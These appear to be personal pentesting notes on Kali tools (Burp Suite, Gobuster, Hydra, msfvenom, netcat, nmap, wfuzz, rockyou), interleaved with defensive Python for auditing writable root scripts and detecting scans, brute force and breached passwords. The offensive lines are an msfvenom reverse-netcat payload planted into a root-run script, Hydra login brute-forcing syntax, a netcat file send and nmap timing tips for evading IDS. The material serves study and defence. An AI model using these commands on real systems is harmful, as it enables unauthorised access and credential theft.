Security Tools

This section covers a wide variety of security tools that can be found on Kali Linux.

Burp Suite

Burp Suite is a framework of web application pentesting tools. See ZAP for a similar (completely free) tool.

Burp Suite needs to be able to act as a proxy. Follow the TryHackMe tutorial to set up FoxyProxy in Firefox.

Components

Burp suite has a number of different components:

  • Proxy: Funnel traffic through Burp
  • Target: Scope the project. Can be used to create a sitemap of the application we are testing.
  • Intruder: Powerful tool. Can be used for anything from field fuzzing to credential stuffing.
  • Repeater: "Repeat" requests. Often used with fuzzing.
  • Sequencer: Analyze the "randomness" present where random is intended
  • Decoder: Transforms data
  • Extender: Add extensions
  • Scanner (Premium Feature): Automated web vulnerability scanner

• Intruder

Positions

From the Positions tab, you may select different fields to attack.

Attack type

  • Cluster Bomb: Brute force. Iterate through every combination of the payloads.

Payloads

Add payloads (dictionaries).

To start the attack, press the attack button in the top right corner. :)

• Proxy

Intercept

The intercept tab intercepts web traffic and allows you to view the request. You can send particular parts of this request to different modules, such as the Intruder module.

Cyberchef

CyberChef

Gobuster

Gobuster is a tool used to brute-force URIs (directories and files), DNS subdomains, virtual host names, and open Amazon S3 buckets.

There are three modes:

  • dir
  • vhost
  • dns

• Dir

dir mode arguments:

  • -u: What url to enumerate
  • -w: Wordlist to append to the url
  • -x: Extensions to append to each word in the wordlist

Example:

$ gobuster dir -u http://example.com -w wordlist.txt -x php,txt,html

Hydra

Hydra is a network logon cracker for many different services.

• Http Post Form

General syntax:

$ hydra -l <username> -P <wordlist> <Target IP> http-post-form "<URL Path>:<Post Arg>=^<KEY>^:<TAGS>"

Example:

  • hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.10.10 http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect"

• Ssh

General syntax:

$ hydra -l <username> -P <absolute path to passwords file> <Target IP> -t <thread count> ssh

Msfvenom

Payload generator and encoder. Generates payloads that allow for things such as a reverse netcat connection

• Examples

Reverse Netcat

If there is a script that we can write to and that runs as root on the target machine:

  • Local: msfvenom -p cmd/unix/reverse_netcat lhost=LOCALIP lport=8888 R
  • Local: nc -lvp 8888
  • Target: echo <msfvenom output> > script
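The scenario above depends on a script that root executes and that an unprivileged user can edit. As an added example, not part of these notes, the following Python audits a directory of scripts for exactly that condition (group- or world-writable files, or a world-writable parent directory without the sticky bit). The directory name and the two sample scripts are constructed by build_demo_dir; the check covers permission bits only, not file ownership.

```python
import os
import stat
import tempfile


def permission_problems(path):
    """List the ways `path` could let a non-owner change what root will run:
    group- or world-writable file bits, or a world-writable parent directory
    without the sticky bit (which lets anyone replace the file wholesale)."""
    problems = []
    mode = os.stat(path).st_mode
    if mode & stat.S_IWGRP:
        problems.append("group-writable")
    if mode & stat.S_IWOTH:
        problems.append("world-writable")
    parent_mode = os.stat(os.path.dirname(os.path.abspath(path))).st_mode
    if parent_mode & stat.S_IWOTH and not parent_mode & stat.S_ISVTX:
        problems.append("parent-dir-world-writable")
    return problems


def audit_directory(directory):
    """Return {filename: problems} for every regular file in `directory`
    that has at least one problem; clean files are omitted."""
    findings = {}
    for name in sorted(os.listdir(directory)):
        full = os.path.join(directory, name)
        if os.path.isfile(full):
            problems = permission_problems(full)
            if problems:
                findings[name] = problems
    return findings


def build_demo_dir():
    """Constructed stand-in for a cron script directory (not a real system path):
    two scripts, one locked down and one that anyone can edit. Returns the path."""
    directory = tempfile.mkdtemp(prefix="cron-demo-")
    os.chmod(directory, 0o755)
    for name, mode in (("backup.sh", 0o755), ("cleanup.sh", 0o777)):
        path = os.path.join(directory, name)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\necho placeholder\n")
        os.chmod(path, mode)
    return directory


if __name__ == "__main__":
    demo = build_demo_dir()
    for name, problems in audit_directory(demo).items():
        print(name, "->", ", ".join(problems))
```

Point audit_directory at a real cron or init script directory to run the same check there; a non-empty result is what the msfvenom step above needs and what a hardening pass should remove.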

Netcat

Netcat allows you to listen or connect to TCP/UDP ports

General syntax:

$ netcat [options] host port

• Listener

Create a listener on port 4444:

$ netcat -l 4444

• Send

Send traffic (from file specifically):

$ netcat 192.168.1.1 4444 < file.txt

Nmap

• Output

  • -oA: Saves output in all three file types; grepable, XML, and script kiddie
  • -oG: Saves output in a grepable format
  • -oX: Saves output as an XML file
  • -oS: Saves output in a script kiddie format
  • -v: Verbose. Some output is nice to see the progress
  • -vv: Very verbose

• Scans

  • -A: Aggressive scan. Enables OS detection, version detection, script scanning, and traceroute
    • Same as -O -sV -sC --traceroute
  • -O: Operating system detection
  • -p <ports,>: Specify ports to scan
    • -p-: Scan every port
  • -Pn: Treat each host as active. Skip host discovery
  • -sS: TCP SYN scan (stealth scan). Quick scan. Does not complete the TCP connection
  • -sT: TCP connection scan
  • -sU: UDP scan
  • -sV: Service version scan

• Scripts

To use a script: --script <script name>. Here is a list of nmap scripts.

Useful scripts:

  • vulners: Check for known vulnerabilities

• Timing

-T<N>: How aggressively (quickly) to scan. Ranges from 0 to 5.

  • 0: Paranoid. Waits 5 minutes between each probe
  • 1: Sneaky. Waits 15 seconds between probes
  • 2: Polite. Waits 0.4 seconds between probes
  • 3: Normal. Default. Includes parallelization
  • 4: Aggressive
  • 5: Insane

1 and 2 are useful to avoid IDS alerts.
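The reason the slower timing templates evade alerts is that many scan detectors only count within a short window. As an added example, not part of these notes, the following Python shows the defensive side: a sliding-window detector that counts distinct destination ports per (source, destination) pair. The flow records are constructed; 203.0.113.7 probes 20 ports fifteen seconds apart, the spacing given above for -T1, and a 60-second window never sees more than five ports, while a 10-minute window catches the whole scan.

```python
from collections import defaultdict

# Constructed flow records as (seconds, src, dst, dst_port); not real telemetry.
# 203.0.113.7 touches 20 ports on 10.0.0.10 fifteen seconds apart, the -T1 spacing
# from the notes, so the whole scan takes just under five minutes.
SLOW_SCAN = [(15 * i, "203.0.113.7", "10.0.0.10", port)
             for i, port in enumerate(range(21, 41))]
# 10.0.0.5 behaves like an ordinary client: a few connections to two services.
NORMAL = [(0, "10.0.0.5", "10.0.0.10", 443), (2, "10.0.0.5", "10.0.0.10", 443),
          (30, "10.0.0.5", "10.0.0.10", 80), (400, "10.0.0.5", "10.0.0.10", 443)]
RECORDS = SLOW_SCAN + NORMAL


def distinct_ports_in_window(records, window):
    """For every (src, dst) pair, the largest number of distinct destination ports
    contacted inside any span of `window` seconds, found with a sliding window
    over the time-sorted records."""
    by_pair = defaultdict(list)
    for t, src, dst, port in sorted(records):
        by_pair[(src, dst)].append((t, port))
    result = {}
    for pair, events in by_pair.items():
        in_window = defaultdict(int)  # port -> hits currently inside the window
        best = start = 0
        for t_end, port in events:
            in_window[port] += 1
            while t_end - events[start][0] > window:
                old_port = events[start][1]
                in_window[old_port] -= 1
                if in_window[old_port] == 0:
                    del in_window[old_port]
                start += 1
            best = max(best, len(in_window))
        result[pair] = best
    return result


def scanners(records, window, threshold):
    """Sources that reached at least `threshold` distinct ports on one host
    within `window` seconds."""
    hits = distinct_ports_in_window(records, window)
    return sorted({src for (src, _dst), n in hits.items() if n >= threshold})


if __name__ == "__main__":
    for window in (60, 600):
        print(f"window={window}s:", scanners(RECORDS, window, threshold=10))
```

The trade-off is the usual one: a longer window catches slower scans but holds more state per pair and raises the chance that a chatty legitimate client crosses the threshold, so the port count threshold and window length have to be tuned together.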

Reverse Shells

• Php

php-reverse-shell.php

Searchsploit

SearchSploit is a command line search tool for Exploit-DB

Needs to be updated periodically (weekly): searchsploit -u

• Automation

You can use the XML file generated by nmap to automate finding exploits.

--nmap <file>.xml

Sqlmap

cheatsheet. PayloadsAllTheThings. General sql injection payload list.

Wfuzz

Wfuzz is a web application brute-forcer. It replaces every occurrence of the FUZZ keyword with a given payload. Its uses range from fuzzing URIs, similar to gobuster, to more complicated tasks such as GET and POST parameters.

Arguments:

  • -c: Color
  • -u: URL to use for the request
  • -d: Parameters to fuzz with. For example, to fuzz a php argument: -d "date=FUZZ"
  • -z: Specify what will replace FUZZ.
    • file: Replace with a file. Example: -z file,wordlist.txt
  • --hc: Don't show certain http response codes. For example: --hc 404
  • --hl: Hide responses with the given number of lines
  • --hh: Hide responses with the given number of characters

Example:

$ wfuzz -c -z file,big.txt localhost:80/FUZZ/note.txt
$ wfuzz -c -z file,big.txt -d "username=FUZZ&password=FUZZ" -u http://example.com/login.php
$ wfuzz -c -z file,wordlist.txt -d "date=FUZZ" -u http://10.10.180.198/api/site-log.php --hh 0
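The gobuster, Hydra http-post-form and wfuzz runs above all leave a distinctive trail in the web server's access log: a burst of 404s from one address, or a burst of POSTs to the login form. As an added example serving all three sections (not code from these notes or from any of those tools), the following Python parses combined-format access log lines and flags either pattern within a sliding time window. The log lines and thresholds are constructed; note that the failed logins return 200 because the server reports failure in the page body (which is exactly what Hydra's F=incorrect matches on), so the detector keys on method and path rather than on status code.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed combined-format access log lines (not from a real server).
# 10.0.0.5 is an ordinary visitor, 203.0.113.9 walks a wordlist of paths and
# 198.51.100.7 hammers the login form. Failed logins answer 200 with the failure
# in the body, so a status-code filter alone would not see them.
SAMPLE_ACCESS_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Oct/2023:13:55:38 +0000] "GET /favicon.ico HTTP/1.1" 404 162 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Oct/2023:13:55:40 +0000] "GET /admin HTTP/1.1" 404 162 "-" "gobuster/3.1"
203.0.113.9 - - [10/Oct/2023:13:55:41 +0000] "GET /backup HTTP/1.1" 404 162 "-" "gobuster/3.1"
203.0.113.9 - - [10/Oct/2023:13:55:42 +0000] "GET /config.php HTTP/1.1" 404 162 "-" "gobuster/3.1"
203.0.113.9 - - [10/Oct/2023:13:55:43 +0000] "GET /old HTTP/1.1" 404 162 "-" "gobuster/3.1"
203.0.113.9 - - [10/Oct/2023:13:55:44 +0000] "GET /test.txt HTTP/1.1" 404 162 "-" "gobuster/3.1"
203.0.113.9 - - [10/Oct/2023:13:55:45 +0000] "GET /uploads HTTP/1.1" 404 162 "-" "gobuster/3.1"
10.0.0.5 - - [10/Oct/2023:13:56:01 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2023:13:57:10 +0000] "POST /login HTTP/1.1" 200 1043 "-" "Mozilla/5.0 (Hydra)"
198.51.100.7 - - [10/Oct/2023:13:57:10 +0000] "POST /login HTTP/1.1" 200 1043 "-" "Mozilla/5.0 (Hydra)"
198.51.100.7 - - [10/Oct/2023:13:57:11 +0000] "POST /login HTTP/1.1" 200 1043 "-" "Mozilla/5.0 (Hydra)"
198.51.100.7 - - [10/Oct/2023:13:57:11 +0000] "POST /login HTTP/1.1" 200 1043 "-" "Mozilla/5.0 (Hydra)"
198.51.100.7 - - [10/Oct/2023:13:57:12 +0000] "POST /login HTTP/1.1" 200 1043 "-" "Mozilla/5.0 (Hydra)"
198.51.100.7 - - [10/Oct/2023:13:57:12 +0000] "POST /login HTTP/1.1" 200 1043 "-" "Mozilla/5.0 (Hydra)"
"""

# Client IP, timestamp, request line and status of the combined log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)


def parse_line(line):
    """One log line -> dict, or None if the line does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "method": m.group("method"),
        "path": m.group("path"),
        "status": int(m.group("status")),
    }


def max_in_window(times, window):
    """Largest number of events falling inside any span of length `window`."""
    times = sorted(times)
    best = start = 0
    for end, t in enumerate(times):
        while t - times[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best


def detect(log_text, window_seconds=60, notfound_threshold=5,
           login_threshold=5, login_path="/login"):
    """Return sorted (ip, alert_type, count) tuples for sources whose 404s or
    POSTs to the login path exceed the threshold inside the window."""
    notfound, logins = defaultdict(list), defaultdict(list)
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        if ev["status"] == 404:
            notfound[ev["ip"]].append(ev["ts"])
        if ev["method"] == "POST" and ev["path"] == login_path:
            logins[ev["ip"]].append(ev["ts"])
    window = timedelta(seconds=window_seconds)
    alerts = []
    for ip, times in notfound.items():
        n = max_in_window(times, window)
        if n >= notfound_threshold:
            alerts.append((ip, "directory_bruteforce", n))
    for ip, times in logins.items():
        n = max_in_window(times, window)
        if n >= login_threshold:
            alerts.append((ip, "login_bruteforce", n))
    return sorted(alerts)


if __name__ == "__main__":
    for alert in detect(SAMPLE_ACCESS_LOG):
        print(alert)
```

The thresholds here are deliberately low to suit the short sample; on a real site, tune them against a baseline of normal 404 and login rates, and remember that wfuzz's --hc/--hh filters only change what the attacker sees, not what the server logs.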

Whois

Get DNS information for a website.

Example:

$ whois daltoncole.com

Word Lists

A large collection of word lists can be found here.

• Rockyou

rockyou.txt is a leaked unencrypted password list from RockYou. On Kali, it can be found under /usr/share/wordlists/rockyou.txt.gz. Use gzip -d rockyou.txt.gz to unzip it.
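The same list an attacker feeds to Hydra is what a defender can use to reject passwords at account creation. As an added example, not part of these notes, the following Python streams a gzipped wordlist into a set and classifies a candidate password as breached, a trivially mangled variant of a breached entry, or acceptable. The sample wordlist is a constructed stand-in for rockyou.txt.gz; it includes a non-UTF-8 byte because the real file is not valid UTF-8 throughout, which is why lines are decoded as latin-1.

```python
import gzip
import io

# Constructed miniature stand-in for rockyou.txt.gz: a few entries, one of which
# contains a non-UTF-8 byte just as the real file does. Not the real list.
SAMPLE_WORDLIST_GZ = gzip.compress(
    b"123456\npassword\niloveyou\nprincess\n" + b"caf\xe9\n" + b"rockyou\n"
)


def load_wordlist(source):
    """Stream a gzipped, newline-separated wordlist into a set of strings.

    `source` is a path to a .gz file (e.g. /usr/share/wordlists/rockyou.txt.gz)
    or, for the sample above, raw gzip bytes. rockyou.txt is not valid UTF-8
    throughout, so each line is decoded as latin-1, which maps every byte to a
    character and therefore never raises."""
    fh = gzip.open(io.BytesIO(source)) if isinstance(source, bytes) else gzip.open(source)
    words = set()
    with fh:
        for raw in fh:
            word = raw.rstrip(b"\r\n").decode("latin-1")
            if word:
                words.add(word)
    return words


def check_password(candidate, words):
    """Classify a candidate password against the leaked list.

    'breached'         - appears verbatim in the list
    'breached_variant' - the list contains it after lowercasing and stripping
                         trailing digits/punctuation (Password1! -> password),
                         the usual mangling applied to a known-bad base word
    'ok'               - neither of the above"""
    if candidate in words:
        return "breached"
    base = candidate.lower().rstrip("0123456789!@#$%^&*.")
    if base and base in words:
        return "breached_variant"
    return "ok"


if __name__ == "__main__":
    words = load_wordlist(SAMPLE_WORDLIST_GZ)
    for pw in ("iloveyou", "Password1!", "caf\xe9", "xK9#qLm2$vT"):
        print(pw, "->", check_password(pw, words))
```

Loading the full rockyou list into a Python set costs roughly a gigabyte of memory, so for a long-running password-policy service keep the list in a Bloom filter or an on-disk sorted index instead of a set; the classification logic stays the same.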

Zap

OWASP ZAP is an enumeration tool similar to Burp Suite; however, ZAP is open source and completely free.